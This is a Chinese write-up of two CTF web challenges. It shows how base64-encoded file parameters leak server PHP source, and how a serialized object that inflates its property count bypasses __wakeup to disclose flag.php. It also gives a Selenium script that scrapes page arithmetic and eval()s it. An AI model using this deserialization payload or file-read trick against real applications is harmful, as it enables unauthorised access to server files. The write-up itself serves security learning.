两道CTF Web的题目
唐宋源码清 2019-10-26
1.easyphp
1.1.题目描述
题目首先是一张不存在的图片
查看源码发现只有一句话
<img src="show.php?img=aGludC5qcGc=" width="100%"/>
点开源码中图片的链接,跳转到下面的页面
img 后面的内容很像是 base64 编码,经过解码验证,确实是 base64 编码,还原后是 hint.jpg 。
尝试把 img 后面的参数用 flag.jpg、flag.php、flag 的base64编码代替后访问,并没有获取到有价值内容
直接访问 index.php 或者 show.php 也看不到任何东西,所以看看能不能利用 img 这个参数读取两个php源码
index.php 的 base64编码为 aW5kZXgucGhw
show.php 的 base64 编码为 c2hvdy5waHA=
经过尝试后,这时通过源码已经可以读取到内容,内容分别如下
index.php
<?php
require_once(‘hint.php‘);
$x = new hint();
isset($_GET[‘class‘]) && $g = $_GET[‘class‘];
if (!empty($g)) {
$x = unserialize($g);
echo $x;
}
?>
<img src="show.php?img=aGludC5qcGc=" width="100%"/>show.php
<?php
$f = $_GET[‘img‘];
if (!empty($f)) {
$f = base64_decode($f);
if (stripos($f,‘..‘)===FALSE && stripos($f,‘/‘)===FALSE && stripos($f,‘\\‘)===FALSE
&& stripos($f,‘flag‘)===FALSE) {
readfile($f);
} else {
echo "File not found!";
}
}
?>从 index.php 的源码里看到还有个 hint.php,用同样的方法读取,内容如下
hint.php 的 base64 编码为 aGludC5waHA=
<?php
error_reporting(0);
//flag is in flag.php
class hint{
public $file=‘‘;
function __destruct(){
if(!empty($this->file)) {
if(strchr($this-> file,"\\")===false && strchr($this->file, ‘/‘)===false)
show_source(dirname (__FILE__).‘/‘.$this ->file);
else die(‘Wrong filename.‘);
}}
function __wakeup(){ $this-> file=‘index.php‘; }
public function __toString(){return ‘‘ ;}}
?>1.2.代码审计
hint.php 里面告诉我们 flag 在 flag.php中,所以我们要尝试去读取到这个 php 文件
show.php 里面用 stripos 限制了我们读取的内容,我们不能通过 show.php 的方式来读取到 flag.php
hint 里面定义了一个 hint 类,这个类有个 show_source(dirname (__FILE__).‘/‘.$this ->file); 方法,可以读取我们的 php 文件
而在 index.php 里面用到了 unserialize() 函数,用来反序列化一个 hint 对象,我们可以尝试使用反序列化的方式来读取 flag.php
1.3.Payload构造
将 hint.php 复制到本地,然后添加下面几行代码,通过网页取得序列化后的字符串
$x=new hint(); $x->file="flag.php"; echo serialize($x);
O:4:"hint":1:{s:4:"file";s:8:"flag.php";}
序列化字符串的含义可以参考:https://www.cnblogs.com/dogecheng/p/11652022.html
根据 index.php 的源码,我们把这个字符串赋值给 class 就好了,但是并没有取得 flag
在网上查询了一些资料后得知,通过 unserialize 反序列化之后,还会调用 __wakeup() 方法,它会把 file 设为 index.php,所以读取的并不是 flag.php
我们需要绕过 __wakeup() 函数,但是绕过方法很简单。当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。
我们原来的序列化字符串为:
O:4:"hint":1:{s:4:"file";s:8:"flag.php";}
我们只需要把 1 改成比它大的数字即可
O:4:"hint":2:{s:4:"file";s:8:"flag.php";}
这时候重新提交请求就能获得 flag 了
2.calculate
2.1.题目描述
题目如下
要求我们回答10道计算题。经过测试,每道题要在3秒内答对,答错或超时清零回答正确的问题个数。而且答题间隔要在1秒以上。
页面源码如下,计算表达式 都在 div 中
<h1>calculate</h1> <p>Answer the questions for 10 times and you can get flag.</p> <p> You Have answered 0銆€questions;</p> <form action="" method="post"> <div style="display:inline;color:#499E86">6</div><div style="display:inline;color:#BC2109">1</div><div style="display:inline;color:#E20AAD">5</div><div style="display:inline;color:#AE2893">+</div><div style="display:inline;color:#A3A7DA">9</div><div style="display:inline;color:#72311C">9</div><div style="display:inline;color:#7D99E9">7</div><div style="display:inline;color:#3DB475">+</div><div style="display:inline;color:#2144AE">6</div><div style="display:inline;color:#8523C0">1</div><div style="display:inline;color:#D42154">5</div><div style="display:inline;color:#DD166F">*</div><div style="display:inline;color:#0ADBF4">9</div><div style="display:inline;color:#116660">9</div><div style="display:inline;color:#4F6723">7</div><div style="display:inline;color:#7F7A0D">=</div> <input type="text" name="ans"> <input type="submit" value="send!"> </form>
2.2.脚本编写
一开始用 python 的 requests 库来做,没有成功,改用 selenium 来做就成功了 ,代码如下:
from selenium import webdriver
from bs4 import BeautifulSoup
import time
driver=webdriver.Firefox()
driver.get("http://****:13002/")
def submit(driver):
# 获取源码
source = driver.page_source
# BeautifulSoup解析
soup = BeautifulSoup(source, "lxml")
all_div = soup.find_all(name="div")
# 获取表达式
s = ""
for i in all_div:
s = s + i.contents[0]
# 去掉等号
s = s[:-1]
print(s)
# 计算
res = eval(s)
# 填入答案
element = driver.find_element_by_name("ans")
element.send_keys(res)
# 等待 1.1 秒
time.sleep(1.1)
# 提交答案
driver.find_element_by_xpath("/html/body/form/input[2]").click()
print("click")
for i in range(10):
submit(driver)回答 10 次后在页面上就会出现 flag
